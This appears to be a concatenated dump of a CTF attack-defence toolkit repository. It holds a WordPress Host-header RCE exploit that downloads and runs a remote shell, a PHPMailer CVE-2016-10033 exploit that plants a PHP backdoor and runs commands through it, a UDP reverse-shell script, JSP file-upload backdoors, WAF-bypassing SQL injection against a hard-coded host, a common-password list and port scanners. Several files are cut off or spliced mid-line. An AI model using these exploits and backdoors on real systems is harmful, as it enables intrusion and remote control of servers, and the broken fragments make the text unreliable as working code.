23 | 'wp-submit': 'Get New Password'
24 | }
25 | headers = {
26 | 'Host': generate_command('/usr/bin/curl -o/tmp/rce ' + shell_url),
27 | 'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
28 | }
29 | proxies = {
30 | 'http': 'http://127.0.0.1:8080'
31 | }
32 | target += '/wp-login.php?action=lostpassword'
33 | requests.post(target, headers=headers, data=data, proxies=proxies, allow_redirects=False)
34 | headers['Host'] = generate_command('/bin/bash /tmp/rce')
35 | requests.post(target, headers=headers, data=data, proxies=proxies, allow_redirects=False)
--------------------------------------------------------------------------------
/dict/password/adobe100.txt:
--------------------------------------------------------------------------------
1 | 123456
2 | 123456789
3 | password
4 | adobe123
5 | 12345678
6 | qwerty
7 | 1234567
8 | 111111
9 | photoshop
10 | 123123
11 | 1234567890
12 | 000000
13 | abc123
14 | 1234
15 | adobe1
16 | macromedia
17 | azerty
18 | iloveyou
19 | aaaaaa
20 | 654321
21 | 12345
22 | 666666
23 | sunshine
24 | 123321
25 | letmein
26 | monkey
27 | asdfgh
28 | password1
29 | shadow
30 | princess
31 | dragon
32 | adobeadobe
33 | daniel
34 | computer
35 | michael
36 | 121212
37 | charlie
38 | master
39 | superman
40 | qwertyuiop
41 | 112233
42 | asdfasdf
43 | jessica
44 | 1q2w3e4r
45 | welcome
46 | 1qaz2wsx
47 | 987654321
48 | fdsa
49 | 753951
50 | chocolate
51 | fuckyou
52 | soccer
53 | tigger
54 | asdasd
55 | thomas
56 | asdfghjkl
57 | internet
58 | michelle
59 | football
60 | 123qwe
61 | zxcvbnm
62 | dreamweaver
63 | 7777777
64 | maggie
65 | qazwsx
66 | baseball
67 | jennifer
68 | jordan
69 | abcd1234
70 | trustno1
71 | buster
72 | 555555
73 | liverpool
74 | abc
75 | whatever
76 | 11111111
77 | 102030
78 | 123123123
79 | andrea
80 | pepper
81 | nicole
82 | killer
83 | abcdef
84 | hannah
85 | test
86 | alexander
87 | andrew
88 | 222222
89 | joshua
90 | freedom
91 | samsung
92 | asdfghj
93 | purple
94 | ginger
95 | 123654
96 | matrix
97 | secret
98 | summer
99 | 1q2w3e
100 | snoopy1
101 |
--------------------------------------------------------------------------------
/other/test.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | #
import ast
import hashlib
import operator
import urllib

import bs4
import requests
7 |
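def _safe_arith(expr):
    """Evaluate an arithmetic expression over numeric literals without eval().

    Only the binary operators ``+ - * / // %``, unary minus and numeric
    literals are accepted; any other node (names, attributes, calls,
    subscripts, ...) raises ValueError. This replaces ``eval()`` on text cut
    out of the server's response — that text is controlled by the remote
    side, so feeding it to eval() would let the server run arbitrary code on
    the client. ``/`` is true division here; the original eval() on Python 2
    would have floor-divided two ints.
    """
    ops = {
        ast.Add: operator.add,
        ast.Sub: operator.sub,
        ast.Mult: operator.mul,
        ast.Div: operator.truediv,
        ast.FloorDiv: operator.floordiv,
        ast.Mod: operator.mod,
    }

    def _ev(node):
        if isinstance(node, ast.BinOp) and type(node.op) in ops:
            return ops[type(node.op)](_ev(node.left), _ev(node.right))
        if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.USub):
            return -_ev(node.operand)
        # literal_eval accepts an AST node and rejects anything but a literal.
        value = ast.literal_eval(node)
        if isinstance(value, bool) or not isinstance(value, (int, float)):
            raise ValueError("not a numeric literal: %r" % (value,))
        return value

    return _ev(ast.parse(expr.strip(), mode="eval").body)


def _comments(html):
    """Return the HTML comments of *html* in document order."""
    soup = bs4.BeautifulSoup(html, "html.parser")
    return soup.findAll(text=lambda t: isinstance(t, bs4.Comment))


BASE_URL = "http://106.75.67.214:2250"

# Stage 1: the server sends a SHA-1 digest in the Ciphertext header and, in the
# third HTML comment, a "(... + X)" expression whose X is presumably the salt
# appended to the 3-digit pass — TODO confirm against the challenge page.
# A timeout keeps the script from hanging forever on a dead host.
req = requests.get(BASE_URL, timeout=10)
_cookies = req.cookies
text = req.headers['Ciphertext']
print(text)

part = _comments(req.content)[2].split("+")[1].split(")")[0]
print(part)

# Brute-force the 3-digit prefix i with sha1(str(i) + part) == text.
# range(100, 1000) includes 999; the original range(100, 999) stopped at 998.
for i in range(100, 1000):
    dest = str(i) + part
    # .encode() is needed on Python 3, where sha1() rejects str.
    if hashlib.sha1(dest.encode("utf-8")).hexdigest() != text:
        continue

    data = {"pass": i}
    req = requests.post(BASE_URL, data=data, cookies=_cookies, timeout=10)
    print(req.content)

    # Stage 2: the third comment now holds an arithmetic challenge after a
    # fullwidth colon. It comes from the server, so it never reaches eval().
    comment = _comments(req.content)[2]
    print(comment)
    part = comment.split(u"\uff1a")[1]
    result = _safe_arith(part)

    data = {"pass": result}
    req = requests.post(BASE_URL, data=data, cookies=_cookies, timeout=10)
    print(req.content)  # flag{f325c62b-9505-4c13-ad4b-010bddb23c68}
    break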
43 |
--------------------------------------------------------------------------------
/scripts/shell_53_udp.py:
--------------------------------------------------------------------------------
1 | # -*- coding:utf-8 -*-
2 | #!/usr/bin/env python
3 | """
4 | back connect py version,only linux have pty module
5 | code by google security team
6 | UDP by anthrax@insight-labs.org
7 | """
8 | import sys,os,socket,pty
9 | shell = "/bin/sh"
10 | def usage(name):
11 | print 'python reverse connector'
12 | print 'usage: %s COMMAND: %s
\n", cmd);
66 | fflush(stdout);
67 | execl("/bin/sh", "/bin/sh", "-c", cmd, 0);
68 | }
69 |
70 | }
71 |
72 |
73 |
74 |
75 |
--------------------------------------------------------------------------------
/tools/sqlin.py:
--------------------------------------------------------------------------------
1 | #!/bin/env python
2 | #-*- encoding: utf-8 -*-
3 |
4 | import requests
5 | import re
6 | import string
7 | import random
8 | import sys
9 |
10 | reload(sys)
11 | sys.setdefaultencoding("utf-8")
12 |
13 | req = requests.session()
14 |
15 |
def post(url, data, headers):
    """POST ``data`` to ``url`` through the module-level session ``req``.

    Returns the raw response body on HTTP 200 and ``False`` for any other
    status code.
    """
    response = req.post(url=url, data=data, headers=headers)
    return response.content if response.status_code == 200 else False
22 |
23 |
def get(url, headers):
    """GET ``url`` through the module-level session ``req``.

    Returns the raw response body on HTTP 200 and ``False`` otherwise.
    """
    response = req.get(url=url, headers=headers)
    return response.content if response.status_code == 200 else False
30 |
31 |
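def get_1(url, headers):
    """Alias of :func:`get` kept for callers that use this name.

    The original was a verbatim copy of ``get``; delegating keeps one
    implementation to maintain.
    """
    return get(url, headers)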
38 |
39 |
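def get_2(url, headers):
    """Alias of :func:`get` kept for callers that use this name.

    The original was a verbatim copy of ``get``; delegating keeps one
    implementation to maintain.
    """
    return get(url, headers)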
46 |
if __name__ == '__main__':
    # Hard-coded CTF target; the injected id has to get past the site's WAF.
    url = 'http://202.120.7.203/index.php?id='
    # # & 0 1 2 3 4 5 6 7 8 9 @

    headers = {}

    # NUL bytes inside the SQL keywords defeat a naive keyword filter;
    # presumably the target strips them again before the query reaches the
    # database (not verifiable from here).
    sql = "-1 union sel\x00ect 1,(sel\x00ect+flag+fro\x00m+flag),3"
    print(get(url + sql, headers))
    # flag{W4f_bY_paSS_f0R_CI}
--------------------------------------------------------------------------------
/wrapper/wrapper_pipe.c:
--------------------------------------------------------------------------------
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
5 |
6 | #define BUFSIZE 1000
7 |
8 | char *buf;
9 |
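/* SIGCHLD handler: the sandboxed child has exited, so the wrapper exits too.
 * Takes the signal number that signal() delivers; the original K&R-style
 * "void quit()" left the parameter list unspecified.  exit() is not
 * async-signal-safe, but nothing else is running at that point. */
void quit(int sig)
{
    (void) sig;
    exit(0);
}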
14 |
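/* SIGALRM handler: 10 s budget (see alarm() in main) exhausted.
 * write(2) is async-signal-safe; the original printf()/fflush() in a handler
 * can deadlock on stdio's internal lock if the signal lands mid-printf. */
void timeout(int sig)
{
    static const char msg[] = "Times Up!\n";
    (void) sig;
    write(STDOUT_FILENO, msg, sizeof msg - 1);
    exit(0);
}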
21 |
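/* Run ./argv[1] behind a relay that filters the literal "flag" out of stdin
 * and kills everything after 10 s.  Security caveats of the filter, unchanged
 * from the original: it only sees one read() chunk at a time (a word split
 * across two writes passes), it is case-sensitive, and strstr() stops at the
 * first NUL byte, so NUL-prefixed input is never inspected. */
int main(int argc, char *argv[])
{
    int p1[2];          /* parent -> child stdin  */
    int p2[2];          /* child stdout -> parent */
    int pid;
    int n;

    if (argc < 2) {
        fprintf(stderr, "There is no argv\n");
        exit(0);
    }

    /* One spare byte so the buffer can always be NUL-terminated before
     * strstr() looks at it; read() does not terminate what it fills. */
    buf = (char *) calloc(BUFSIZE + 1, 1);
    if (buf == NULL) {
        perror("calloc");
        exit(1);
    }

    /* Bounded copy: a long argv[1] used to overflow exe[] via sprintf(). */
    char exe[50];
    if (snprintf(exe, sizeof exe, "./%s", argv[1]) >= (int) sizeof exe) {
        fprintf(stderr, "target name too long\n");
        exit(1);
    }

    fprintf(stdout, "pwn: %s\n", exe);
    fflush(stdout);

    if (pipe(p1) < 0 || pipe(p2) < 0) {
        perror("pipe");
        exit(1);
    }
    pid = fork();
    if (pid < 0) {
        perror("fork");
        exit(1);
    }

    if (pid) { /* parent: relay and filter */
        signal(SIGCHLD, quit);
        signal(SIGALRM, timeout);
        alarm(10);

        close(p1[0]);
        close(p2[1]);

        /* Forward whatever the child prints before its first prompt. */
        n = read(p2[0], buf, BUFSIZE);
        if (n > 0)
            write(1, buf, n);

        while (1) {
            /* hijack input */
            n = read(0, buf, BUFSIZE);
            if (n <= 0)      /* EOF or error on stdin: the original looped forever
                              * and passed a negative count to write() */
                break;
            buf[n] = '\0';
            if (strstr(buf, "flag")) { /* filter */
                fprintf(stderr, "pwn?\n");
                exit(0);
            }

            write(p1[1], buf, n);
            bzero(buf, BUFSIZE + 1);

            /* hijack output */
            n = read(p2[0], buf, BUFSIZE);
            if (n <= 0)      /* child closed its stdout */
                break;
            write(1, buf, n);
        }

    } else { /* child: wire the pipes to stdin/stdout and exec the target */
        char *const child_argv[] = { exe, NULL };
        close(p1[1]);
        close(p2[0]);
        dup2(p1[0], 0);
        dup2(p2[1], 1);
        /* A real argv instead of NULL: some targets (and newer kernels) reject
         * an empty argument vector. */
        execve(exe, child_argv, NULL);
        perror("execve");   /* only reached when the exec itself fails */
        _exit(1);
    }

    return 0;
}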
83 |
--------------------------------------------------------------------------------
/tools/portscan.py:
--------------------------------------------------------------------------------
1 | #!/bin/env python
2 | # -*- encoding: utf-8 -*-
3 |
import errno
from socket import *
5 |
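__info__ = {
    "desc": "A script for scan port",
    "version": "1.0",
    "usage": "ip port[,more] [timeout]"
}

# connect_ex() result -> human-readable state.  The 1xxxx entries are Winsock
# codes (the script was written on Windows); the errno-based entries make the
# same table work on Linux/macOS, where connect_ex() returns errno values.
# CPython reports a timed-out connect() from connect_ex() as
# EAGAIN/EWOULDBLOCK (10035 on Winsock), hence "filtered".
status = {
    0: "open",
    10049: "address not available",
    10061: "closed",
    10060: "timeout",
    10056: "already connected",
    10035: "filtered",
    11001: "IP not found",
    10013: "permission denied",
    errno.ECONNREFUSED: "closed",
    errno.ETIMEDOUT: "timeout",
    errno.EAGAIN: "filtered",
    errno.EWOULDBLOCK: "filtered",
    errno.EHOSTUNREACH: "unreachable",
    errno.ENETUNREACH: "unreachable",
    errno.EADDRNOTAVAIL: "address not available",
    errno.EISCONN: "already connected",
    errno.EACCES: "permission denied",
}

# Well-known service names for the report line; anything else prints "unknown".
PORT_TABLE = {
    21: "FTP",
    22: "SSH",
    23: "Telent",
    80: "HTTP",
    443: "HTTPS",
    1521: "Oracle Server",
    3306: "MySQL Server",
    3389: "RDP"
}


def scan(ip, port, timeout):
    """Probe one TCP port with a full connect() and describe the result.

    Returns ``"<port> : <service> : <state>"`` where ``service`` comes from
    PORT_TABLE (``"unknown"`` for other ports -- the original raised KeyError
    for every port not in the table) and ``state`` from ``status`` (the raw
    connect_ex() code when the table has no entry).  Returns None when the
    address cannot be resolved or the socket call itself fails; the socket is
    closed on every path (it leaked on exceptions before).
    """
    service = PORT_TABLE.get(port, "unknown")
    s = socket(AF_INET, SOCK_STREAM)
    s.settimeout(timeout)
    try:
        result = s.connect_ex((ip, port))
    except error as exc:  # socket.error: gaierror/herror/OSError family
        print("Cannot connect to IP: %s" % exc)
        return None
    finally:
        s.close()
    state = status.get(result, str(result))
    return "%s : %s : %s" % (port, service, state)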
48 |
49 |
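def run(arg):
    """Scan the ports named on the command line.

    ``arg`` is ``[ip, "port[,port...]", [timeout]]``.  Returns ``'Error'``
    when fewer than two items are given, a single report string for one
    port, or a list of report strings for several.  The optional timeout
    (seconds, default 5) is honoured now: the original tested
    ``len(arg) > 3`` and therefore never read ``arg[2]``.
    """
    data = {
        "ip": "",
        "timeout": 5
    }
    if len(arg) < 2:
        return 'Error'
    data['ip'] = arg[0]
    ports = arg[1].split(",")
    if len(arg) > 2:
        data['timeout'] = int(arg[2])
    if len(ports) == 1:
        data['port'] = int(arg[1])
        return scan(**data)
    else:
        return [scan(port=int(i), **data) for i in ports]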
66 |
if __name__ == '__main__':
    # Sweep port 80 across the hard-coded 192.168.5.0/24 range, one host at a time.
    for host_octet in range(256):
        target = "192.168.5.%d" % host_octet
        print(target)
        print(run([target, "80"]))
71 |
--------------------------------------------------------------------------------
/flowscript/phpwaf.php:
--------------------------------------------------------------------------------
1 | filepath = $filepath;
8 | $this->header = array();
9 | }
10 |
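public function Flow()
{
    /*
     * Append a raw dump of the current request (selected headers, request
     * line, body) to <filepath>/<Y-m-d-H>.log.
     *
     * Everything written here is attacker-controlled: header values and the
     * body go in verbatim, so treat the log as untrusted input (log
     * injection, terminal escape sequences) and keep it outside the web
     * root -- it also contains every client's Cookie header.
     */
    $arr = array('HTTP_HOST','HTTP_USER_AGENT','HTTP_ACCEPT','HTTP_ACCEPT_LANGUAGE','HTTP_ACCEPT_ENCODING','HTTP_REFERER','HTTP_COOKIE','HTTP_X_FORWARDED_FOR','HTTP_CONNECTION');
    $HTTP_Method = $_SERVER['REQUEST_METHOD'];
    $server = $_SERVER;
    // 'H' (24-hour) instead of 'h': with 'h' the 01:00 and 13:00 requests
    // landed in the same hourly file.
    $Allfilepath = $this->filepath.'/'.date('Y-m-d-H').".log";
    foreach($arr as $value){
        // Headers the client did not send are left out (the original raised
        // an undefined-index notice and logged an empty value).
        if(isset($server[$value])){
            $this->header[$value] = $server[$value];
        }
    }
    $head = '';
    foreach ($this->header as $key => $value){
        // stripos() returns false, not -1, when the needle is absent; the
        // original compared against -1 and so never took this branch.
        if(stripos($key, 'HTTP_') !== 0){
            $key = ucwords(strtolower($key));
        }else{
            $key = ucwords(strtolower(substr($key, 5)));
        }
        $head.= $key.': '.$value."\r\n";
    }
    $request_url = $_SERVER['REQUEST_URI'];
    $protocol = $_SERVER['SERVER_PROTOCOL'];
    $post = file_get_contents('php://input');
    $ip = $_SERVER['REMOTE_ADDR'];
    $time = date('Y/m/d H:i:s');
    $content = $ip."\t".$time."\t\n".$HTTP_Method.' '.$request_url.' '.$protocol."\r\n".$head."\n\n".$post."\n\n";
    $this->WriteFile($Allfilepath,$content,FILE_APPEND);
}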
37 |
public function WriteFile($filepath,$content,$FILE_APPEND=FILE_APPEND)
{
    // Thin wrapper around file_put_contents(); $FILE_APPEND is passed through
    // unchanged as the flags argument (defaults to appending).
    $flags = $FILE_APPEND;
    file_put_contents($filepath,$content,$flags);
}
42 | }
43 |
// Logs land in /tmp, which is world-readable on most hosts and will hold
// every client's Cookie header and request body; use a directory readable
// only by the web-server user.
$Catchs = new WafLog('/tmp/');
$Catchs->Flow();
46 | ?>
--------------------------------------------------------------------------------
/crypto/base64_encode_custom_table.c:
--------------------------------------------------------------------------------
#include <stdio.h>
#include <string.h>
3 |
// Alternative alphabet for a "custom table" variant (swap the two lines to
// produce non-standard output that stock decoders will not accept):
// const char * base64Table = "BADCFEHGIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

const char * base64Table = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

/*
 * Encode binlength bytes of bindata into base64 using base64Table, writing
 * the NUL-terminated result into base64 and returning that pointer.
 * Output is padded with '=' to a multiple of four characters; the caller
 * must provide at least 4 * ceil(binlength / 3) + 1 bytes of output space
 * (no bound is checked here).
 */
char * base64_encode(const unsigned char * bindata, char * base64, int binlength)
{
    int in = 0, out = 0;

    while (in < binlength)
    {
        // Each group of three input bytes becomes four 6-bit symbols.
        unsigned int b0 = bindata[in];
        base64[out++] = base64Table[b0 >> 2];

        if (in + 1 >= binlength)
        {
            // One byte left: two symbols plus two pad characters.
            base64[out++] = base64Table[(b0 & 0x03) << 4];
            base64[out++] = '=';
            base64[out++] = '=';
            break;
        }
        unsigned int b1 = bindata[in + 1];
        base64[out++] = base64Table[((b0 & 0x03) << 4) | (b1 >> 4)];

        if (in + 2 >= binlength)
        {
            // Two bytes left: three symbols plus one pad character.
            base64[out++] = base64Table[(b1 & 0x0F) << 2];
            base64[out++] = '=';
            break;
        }
        unsigned int b2 = bindata[in + 2];
        base64[out++] = base64Table[((b1 & 0x0F) << 2) | (b2 >> 6)];
        base64[out++] = base64Table[b2 & 0x3F];

        in += 3;
    }
    base64[out] = '\0';
    return base64;
}
46 |
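/* Encode argv[1] (at most 2048 bytes of it) and print the result.
 * The original left bindata uninitialised (the sprintf() that filled it was
 * commented out -- and was a format-string bug while it existed) and then
 * encoded all 2048 bytes of stack garbage. */
int main(int argc, char ** argv){
    unsigned char bindata[2048];
    char base64[4096];
    if(argc > 1){
        size_t len = strlen(argv[1]);
        if (len > sizeof bindata)
            len = sizeof bindata;   /* truncate rather than overflow */
        memcpy(bindata, argv[1], len);
        printf("%s\n", base64_encode(bindata, base64, (int) len));
    }else{
        printf("Error : argc=%d < 2\n", argc);
    }
    return 0;
}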
--------------------------------------------------------------------------------
/scripts/htpasswd.sh:
--------------------------------------------------------------------------------
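#!/bin/bash
# Interactive helper that appends a "user:hash" line for nginx auth_basic.
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:~/bin
export PATH

echo "====================================="
echo "# A tool like htpasswd for Nginx #"
echo "#-----------------------------------#"
echo "# Author : Virink #"
echo "====================================="

#set UserName
username=""
read -r -p "Please input UserName:" username
if [ "$username" = "" ]; then
    echo "Error:UserName can't be NULL!"
    exit 1
fi
# The auth file format is "user:hash"; a colon in the name would corrupt it.
case "$username" in
    *:*) echo "Error:UserName can't contain ':'"; exit 1 ;;
esac
echo "==========================="
echo "UserName was: $username"
echo "==========================="

#set password
# -s: do not echo the password.  The original echoed it while typing and
# printed it back afterwards, leaving it in scrollback and any session log.
unpassword=""
read -r -s -p "Please input the Password:" unpassword
echo
if [ "$unpassword" = "" ]; then
    echo "Error:Password can't be NULL!"
    exit 1
fi
echo "==========================="
echo "Password received (not shown)"
echo "==========================="
# SHA-512 crypt ($6$) with a fresh random salt instead of DES crypt with the
# fixed salt "pwdsalt": DES crypt silently truncates the password to 8
# characters, and a constant salt lets one precomputed table cover every
# user.  nginx's auth_basic calls the system crypt(), which on glibc accepts
# $6$ hashes.  The password is handed to perl through the environment rather
# than as an argument so it does not show up in `ps`.
salt=$(head -c 12 /dev/urandom | base64 | tr -dc 'A-Za-z0-9./' | head -c 16)
password=$(HTPW="$unpassword" perl -e 'print crypt($ENV{HTPW}, "\$6\$" . $ARGV[0])' "$salt")


#set htpasswd file
htfile=""
read -r -p "Please input Auth filename:" htfile
if [ "$htfile" = "" ]; then
    echo "Error:Auth filename can't be NULL!"
    exit 1
fi
# Keep the file inside /etc/nginx: a name such as "../x" would write elsewhere.
case "$htfile" in
    */*|.*) echo "Error:Auth filename must be a plain file name"; exit 1 ;;
esac
echo "==========================="
echo "Auth File: /etc/nginx/$htfile"
echo "==========================="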
45 |
get_char()
{
    # Read one keypress from the controlling terminal without echo, then
    # restore the terminal settings that were in effect before.
    local saved_tty
    saved_tty=$(stty -g)
    stty -echo
    stty cbreak
    dd if=/dev/tty bs=1 count=1 2> /dev/null
    stty -raw
    stty echo
    stty "$saved_tty"
}
56 | echo ""
57 | echo "Press any key to Creat...or Press Ctrl+c to cancel"
58 | char=`get_char`
59 |
60 | if [ ! -f /etc/nginx/$htfile.conf ]; then
61 | make -p /etc/nginx/$htfile.conf
62 | echo "Create Auth file......"
63 | cat >/etc/nginx/$htfile.conf< -p ")
49 | '''
50 | 调用optparse.OptionParser([usage message])方法生成一个
51 | 参数解析器类的实例。
52 | '''
53 | parser.add_option('-H', dest='tgtHost', type='string',
54 | help='specify target host')
55 | parser.add_option('-p', dest='tgtPort', type='string',
56 | help='specify target port[s] separated by comma')
57 | (options, args) = parser.parse_args()
58 | tgtHost = options.tgtHost
59 | tgtPorts = str(options.tgtPort).split(',')
60 | if(tgtHost == None) | (tgtPorts[0] == None):
61 | print parser.usage
62 | exit(0)
63 | portScan(tgtHost, tgtPorts)
64 |
65 | if __name__ == '__main__':
66 | main()
67 |
--------------------------------------------------------------------------------
/awd/wordpress_phpmailer_exploit.sh:
--------------------------------------------------------------------------------
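#!/bin/bash
# CVE-2016-10033 exploit by opsxcq
# https://github.com/opsxcq/exploit-CVE-2016-10033
#
# Drops /www/backdoor.php on the target through PHPMailer's sendmail
# argument injection, then drives it as an interactive command loop.
# The backdoor is not removed afterwards: clean it up on engagement targets.

echo '[+] CVE-2016-10033 exploit by opsxcq'

if [ -z "$1" ]
then
    echo '[-] Please inform an host as parameter'
    exit 1
fi

# macOS base64 decodes with -D, GNU coreutils with -d.
case "$(uname)" in
    Darwin) decoder='base64 -D' ;;
    Linux)  decoder='base64 -d' ;;
    *)
        echo "[-] Your platform isnt supported: $(uname)"
        exit 1
        ;;
esac


host=$1

echo "[+] Exploiting $host"

# Payload kept verbatim from upstream: the "email" field smuggles sendmail
# options, and -X writes the mail log (our PHP) to a path of our choosing.
curl -sq "http://$host" -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzXJpHSq4mNy35tHe' --data-binary $'------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="action"\r\n\r\nsubmit\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="name"\r\n\r\n\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="email"\r\n\r\n\"vulnerables\\\" -OQueueDirectory=/tmp -X/www/backdoor.php server\" @test.com\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="message"\r\n\r\nPwned\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe--\r\n' >/dev/null && echo "[+] Target exploited, acessing shell at http://$host/backdoor.php"


echo '[+] Checking if the backdoor was created on target system'
code=$(curl -o /dev/null --silent --head --write-out '%{http_code}\n' "http://$host/backdoor.php")

if [ "$code" != "200" ]
then
    echo '[-] Target cant be exploited'
    exit 1
else
    echo '[+] Backdoor.php found on remote system'
fi

cmd='whoami'
while [ "$cmd" != 'exit' ]
do
    echo "[+] Running $cmd"
    # GNU base64 wraps at 76 columns and the output may contain '+', '/' and
    # '=': strip the newlines and let curl URL-encode the value instead of
    # pasting it raw into the query string.  printf '%b' keeps the
    # backslash-escape handling of the original `echo -ne`.
    encoded=$(printf '%b' "$cmd" | base64 | tr -d '\n')
    if ! curl -sq -G "http://$host/backdoor.php" --data-urlencode "cmd=$encoded" | grep '|' | grep -v 'base64_encode' | head -n 1 | cut -d '|' -f 2 | $decoder
    then
        echo '[-] Connection problens'
        exit 1
    fi
    echo
    read -r -p 'RemoteShell> ' cmd
done
echo '[+] Exiting'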
--------------------------------------------------------------------------------
/flowscript/flow.php:
--------------------------------------------------------------------------------
1 | flowdata = array();
8 | $this->redirect = false;
9 | $this->logfiles = "/tmp/flow.log";
10 | $this->Flow();
11 | }
12 |
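public function Flow()
{
    /*
     * Collect method, a few headers, URI, protocol, client IPs, time,
     * content type, query string and body into $this->flowdata, then hand
     * it to Send().  All of it is client-supplied (X-Forwarded-For and
     * Client-IP in particular are freely spoofable), so the resulting log
     * must be treated as untrusted input.
     */
    /* Method */
    $this->flowdata['method'] = $_SERVER['REQUEST_METHOD'];
    /* Header */
    $arr = array(
        'HTTP_HOST',
        'HTTP_REFERER',
        'HTTP_USER_AGENT'
    );
    foreach($arr as $key){
        // Missing headers are recorded as NULL instead of raising a notice.
        $this->flowdata['header'][ucwords(strtolower(str_replace("HTTP_", "", $key)))] = isset($_SERVER[$key]) ? $_SERVER[$key] : null;
    }
    /* Url */
    $this->flowdata['uri'] = $_SERVER['REQUEST_URI'];
    /* Protocol */
    $this->flowdata['protocol'] = $_SERVER['SERVER_PROTOCOL'];
    /* IP */
    $this->flowdata['ip'] = array(
        'REMOTE_ADDR'=>$_SERVER['REMOTE_ADDR'],
        'CLIENT_IP'=>isset($_SERVER['HTTP_CLIENT_IP']) ? $_SERVER['HTTP_CLIENT_IP'] : null,
        'X_FORWARDED_FOR'=>isset($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : null
    );
    /* Time */
    $this->flowdata['time'] = date('Y-m-d H:i:s',$_SERVER['REQUEST_TIME']);
    /* CONTENT_TYPE */
    $this->flowdata['ctype'] = isset($_SERVER['CONTENT_TYPE']) ? $_SERVER['CONTENT_TYPE'] : '';
    /* GetData */
    $this->flowdata['get'] = json_encode($_GET);
    /* PostData */
    // The original tested isset($_POST) (always true) and read the key
    // 'Method' (never set; it is stored as 'method'), so the body was
    // captured unconditionally.  Capture it for POSTs or when form data
    // arrived, using the key that actually exists.
    if(!empty($_POST) or strtolower($this->flowdata['method']) == 'post' ){
        // Content-Type may carry parameters ("...; charset=UTF-8"):
        // compare on the media type only.
        $ctype_parts = explode(';', $this->flowdata['ctype']);
        if(strtolower(trim($ctype_parts[0])) == 'application/x-www-form-urlencoded'){
            $this->flowdata['post'] = json_encode($_POST);
        }else{
            $this->flowdata['post'] = file_get_contents('php://input');
        }
    }
    $this->Send("null");
}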
52 |
public function Send($keyword)
{
    // Append one human-readable record (a print_r dump of flowdata) to the
    // log file, headed by $keyword and closed by a separator.  Always 0.
    $record = "\r\n".$keyword."\r\n".print_r($this->flowdata,true)."\r\n=====================================\r\n";
    file_put_contents($this->logfiles,$record,FILE_APPEND);
    return 0;
}
59 | }
60 |
61 | new PhpFlowLog();
--------------------------------------------------------------------------------
/webshell/jsp/UpServlet.java:
--------------------------------------------------------------------------------
1 | /*
2 | * UpServlet.java 29/04/2005
3 | *
4 | * @author The Dark Raver
5 | * @version 0.1
6 | */
7 |
8 | import java.io.*;
9 | import javax.servlet.*;
10 | import javax.servlet.http.*;
11 |
12 |
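/**
 * File-upload backdoor: every POST body is parsed as a single-part multipart
 * form and its payload written to UPLOAD_PATH.  There is no authentication,
 * origin check or path validation -- intended for authorised engagements only.
 */
public class UpServlet extends HttpServlet {

    // Where the uploaded payload lands (hard-coded, Windows path).
    private static final String UPLOAD_PATH = "c:\\install.log";

    // NOTE: the HTML upload form this method printed was lost when the page
    // was extracted; the string literals below are what survived.
    public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
        res.setContentType("text/html");
        PrintWriter out = res.getWriter();
        out.print("");
        out.print("
");
        out.print("");
    }


    public void doPost(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
        int c = '\0';
        int contador = 0;
        ServletInputStream in = req.getInputStream();
        DataInputStream post = new DataInputStream(in);

        PrintWriter out = res.getWriter();
        res.setContentType("text/html");
        out.print("");

        // First line of the body is the multipart boundary ("tag").
        StringBuilder tagBuf = new StringBuilder();
        while((c=post.read()) != -1 && c != '\r' && c != '\n') {
            tagBuf.append((char)c);
            contador++;
        }
        String tag = tagBuf.toString();

        // Skip four more lines: rest of the boundary line, Content-Disposition,
        // Content-Type and the blank separator.
        for(int i=0; i <4; i++) while((c=post.read()) != -1 && c != '\n') contador++;

        // (!) Uploaded File Name
        File newfile = new File(UPLOAD_PATH);

        // Payload length = Content-Length minus boundary, skipped header bytes
        // and a constant 11 for the trailing "--<tag>--" bookkeeping.  The 11
        // comes from the original and presumes "\r\n" line endings and exactly
        // one part -- not verified here; confirm against the form that posts.
        int payload = req.getContentLength() - tag.length() - contador - 11;

        FileOutputStream fileout = new FileOutputStream(newfile);
        try {
            for(int i=0; i < payload; i++) {
                c=post.read();
                if (c == -1) break;    // truncated body: the original wrote 0xFF bytes to the end
                fileout.write(c);
            }
        } finally {
            fileout.close();           // was leaked on any IOException
        }
        out.print("<== OK");

    }


    public String getServletInfo() {
        return "UpServlet 0.1";
    }

}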
--------------------------------------------------------------------------------
/webshell/servlet/UpServlet.java:
--------------------------------------------------------------------------------
1 | /*
2 | * UpServlet.java 29/04/2005
3 | *
4 | * @author The Dark Raver
5 | * @version 0.1
6 | */
7 |
8 | import java.io.*;
9 | import javax.servlet.*;
10 | import javax.servlet.http.*;
11 |
12 |
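/**
 * File-upload backdoor: every POST body is parsed as a single-part multipart
 * form and its payload written to UPLOAD_PATH.  There is no authentication,
 * origin check or path validation -- intended for authorised engagements only.
 */
public class UpServlet extends HttpServlet {

    // Where the uploaded payload lands (hard-coded, Windows path).
    private static final String UPLOAD_PATH = "c:\\install.log";

    // NOTE: the HTML upload form this method printed was lost when the page
    // was extracted; the string literals below are what survived.
    public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
        res.setContentType("text/html");
        PrintWriter out = res.getWriter();
        out.print("");
        out.print("
");
        out.print("");
    }


    public void doPost(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
        int c = '\0';
        int contador = 0;
        ServletInputStream in = req.getInputStream();
        DataInputStream post = new DataInputStream(in);

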